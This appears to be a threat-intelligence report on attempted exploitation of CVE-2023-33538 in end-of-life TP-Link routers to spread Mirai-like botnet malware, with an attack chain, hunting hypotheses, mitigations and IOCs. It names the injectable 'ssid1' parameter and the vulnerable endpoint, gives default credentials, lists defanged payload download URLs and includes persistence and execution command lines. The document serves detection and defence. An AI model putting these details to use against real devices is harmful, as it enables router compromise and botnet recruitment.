A Deep Dive Into Attempted Exploitation of CVE-2023-33538

Key Takeaways

• Active exploitation attempts targeting CVE-2023-33538 in end-of-life TP-Link routers were observed delivering Mirai-like (Condi variant) botnet malware.
• In-the-wild attacks were largely ineffective because they targeted the wrong parameter ('ssid' instead of 'ssid1'), lacked authentication, and relied on utilities like 'wget' missing from the router's limited BusyBox.
• Deep-dive firmware emulation confirmed the command injection vulnerability is real and exploitable via the 'ssid1' parameter, provided the attacker is authenticated.
• The persistence of default IoT credentials (admin:admin) turns this authenticated vulnerability into a highly practical and critical entry point.
• The dropped malware acts as both a botnet client and a local HTTP server to host and distribute payloads to other compromised devices.

Affected Systems

• TP-Link TL-WR940N v2 and v4
• TP-Link TL-WR740N v1 and v2
• TP-Link TL-WR841N v8 and v10

Vulnerabilities (CVEs)

• CVE-2023-33538

Attack Chain

Attackers scan for vulnerable TP-Link routers and attempt to authenticate using default credentials (admin:admin). Once authenticated, they send a crafted HTTP GET request to the /userRpm/WlanNetworkRpm.htm endpoint, injecting shell commands into the ssid1 parameter. The router's httpd service processes this input without sanitization, executing the commands to download and run a Mirai-like ELF binary. The malware then establishes C2 communication, updates itself, and starts a local HTTP server to propagate to other devices.

Detection Availability

• YARA Rules: No
• Sigma Rules: No
• Snort/Suricata Rules: No
• KQL Queries: No
• Splunk SPL Queries: No
• EQL Queries: No
• Other Detection Logic: No

The article does not provide raw detection rules, but notes that Palo Alto Networks products (Advanced Threat Prevention, Advanced URL Filtering, Cortex Xpanse) have been updated to detect and block the associated C2 infrastructure and exploit attempts.

Detection Engineering Assessment

EDR Visibility: None — The targeted systems are end-of-life IoT routers running custom firmware (MIPS/BusyBox), which do not support standard EDR agents. Network Visibility: High — Exploitation relies on cleartext HTTP GET requests containing shell metacharacters, and the malware communicates with C2 servers using distinct, unencrypted byte patterns. Detection Difficulty: Moderate — While endpoint telemetry is missing, network signatures can reliably detect the command injection attempts in the URI parameters and the specific C2 heartbeat byte sequences.

Required Log Sources

• Network IDS/IPS
• Web Proxy Logs
• Firewall Traffic Logs

Hunting Hypotheses

Hypothesis	Telemetry	ATT&CK Stage	FP Risk
Look for HTTP GET requests targeting /userRpm/WlanNetworkRpm.htm where the 'ssid1' parameter contains shell metacharacters (e.g., backticks, semicolons) or common Linux commands.	Web Proxy Logs / Network IDS	Initial Access	Low
Identify outbound network connections from IoT device IP ranges to unfamiliar external IPs on TCP port 80 or custom high ports (1024-65535), especially following inbound HTTP management traffic.	Firewall Traffic Logs	Command and Control	Medium

Control Gaps

• Lack of endpoint visibility on IoT devices
• Exposure of router web management interfaces to the public internet
• Use of default credentials on network appliances

Key Behavioral Indicators

• HTTP GET requests to /userRpm/WlanNetworkRpm.htm with anomalous ssid1 lengths or characters
• Unexpected reboots of router devices
• Outbound traffic from routers matching Mirai C2 byte patterns (e.g., 0x99 0x66 0x33)

False Positive Assessment

• Low. Legitimate administrative changes to the SSID will not contain shell commands, backticks, or semicolons. Network traffic matching the specific Mirai C2 byte patterns is highly indicative of compromise.

Recommendations

Immediate Mitigation

• Change default credentials (admin:admin) on all TP-Link routers immediately.
• Block access to the router's web management interface from the public internet.

Infrastructure Hardening

• Replace end-of-life TP-Link router models (TL-WR940N, TL-WR740N, TL-WR841N) with supported hardware.
• Implement network segmentation to isolate IoT devices from critical network assets.

User Protection

• Ensure remote workers are not using vulnerable, end-of-life routers for home networks connecting to corporate VPNs.

Security Awareness

• Educate users and administrators on the critical risks of leaving default credentials on IoT and networking equipment.

MITRE ATT&CK Mapping

• T1190 - Exploit Public-Facing Application
• T1078.001 - Valid Accounts: Default Accounts
• T1059.004 - Command and Scripting Interpreter: Unix Shell
• T1105 - Ingress Tool Transfer
• T1037 - Boot or Logon Initialization Scripts

Additional IOCs

• Ips:
  • 46[.]105[.]174[.]146 - IP address observed in the Host header of the HTTP GET exploit request.
• Urls:
  • hxxp://bot[.]ddosvps[.]cc/top1hbt.arm - Payload download URL for ARM architecture.
  • hxxp://bot[.]ddosvps[.]cc/top1hbt.arm5 - Payload download URL for ARM5 architecture.
  • hxxp://bot[.]ddosvps[.]cc/top1hbt.arm6 - Payload download URL for ARM6 architecture.
  • hxxp://bot[.]ddosvps[.]cc/top1hbt.arm7 - Payload download URL for ARM7 architecture.
  • hxxp://bot[.]ddosvps[.]cc/top1hbt.mips - Payload download URL for MIPS architecture.
  • hxxp://bot[.]ddosvps[.]cc/top1hbt.mpsl - Payload download URL for MPSL architecture.
  • hxxp://bot[.]ddosvps[.]cc/top1hbt.x86_64 - Payload download URL for x86_64 architecture.
  • hxxp://bot[.]ddosvps[.]cc/top1hbt.sh4 - Payload download URL for SH4 architecture.
  • hxxp://51[.]38[.]137[.]113/arm - Direct IP payload download URL for ARM architecture.
  • hxxp://51[.]38[.]137[.]113/arm5 - Direct IP payload download URL for ARM5 architecture.
  • hxxp://51[.]38[.]137[.]113/arm6 - Direct IP payload download URL for ARM6 architecture.
  • hxxp://51[.]38[.]137[.]113/x86_64 - Direct IP payload download URL for x86_64 architecture.
  • hxxp://51[.]38[.]137[.]113/mips - Direct IP payload download URL for MIPS architecture.
  • hxxp://51[.]38[.]137[.]113/sh4 - Direct IP payload download URL for SH4 architecture.
• File Hashes:
  • 3fbd2a2e82ceb5e91eadbad02cb45ac618324da9b1895d81ebe7de765dca30e7 (SHA256) - ELF binary archive (arm) downloaded from malicious server.
  • 4caaa18982cd4056fead54b98d57f9a2a1ddd654cf19a7ba2366dfadbd6033da (SHA256) - ELF binary archive (arm5) downloaded from malicious server.
  • 9df711c3aef2bba17b622ddfd955452f8d8eb55899528fbc13d9540c52f13402 (SHA256) - ELF binary archive (arm6) downloaded from malicious server.
  • 00078aeeaca54b5d3c1237e964e9f956690b782e4ea160d81edc3c6b44e7f620 (SHA256) - httpd ELF binary extracted from TP-Link firmware.
  • 534b654531a6a540a144da9545ee343e1046f843d7de4c1091b46c3ee66a508b (SHA256) - ELF binary archive (mips) downloaded from malicious server.
  • 919f292a07a37f163f88527e725406187c8ecc637387ad24853fe49ce4e6ddf4 (SHA256) - ELF binary archive (sh4) downloaded from malicious server.
  • c321933e4e5970ba7299fe21778dab9398994c22ca0ba0422c6cbc3fbb95ea26 (SHA256) - TP-Link firmware image wr940n_us_3_16_9_up_boot(160617).bin.
  • 56f21f412e898ad9e3ee05d5f44c44d9d7bcb9ecbfbdb9de11b8fa5a637aeef6 (SHA256) - ELF binary archive (x86_64) downloaded from malicious server.
• File Paths:
  • /tmp/arm7 - Path where the malicious payload is downloaded and executed on the router.
  • /etc/rc.d/rcS - Router boot script targeted by attackers to establish persistence.
  • /userRpm/WlanNetworkRpm.htm - Vulnerable endpoint used for command injection via the ssid1 parameter.
• Command Lines:
  • Purpose: Modify permissions to make the downloaded payload executable. | Tools: chmod | Stage: Execution | chmod 777 /tmp/arm7
  • Purpose: Overwrite system boot scripts to establish persistence across reboots. | Tools: echo | Stage: Persistence | echo <payload> > /etc/rc.d/rcS
• Other:
  • YWRtaW46YWRtaW4= - Base64 encoded default credentials (admin:admin) observed in exploit attempts.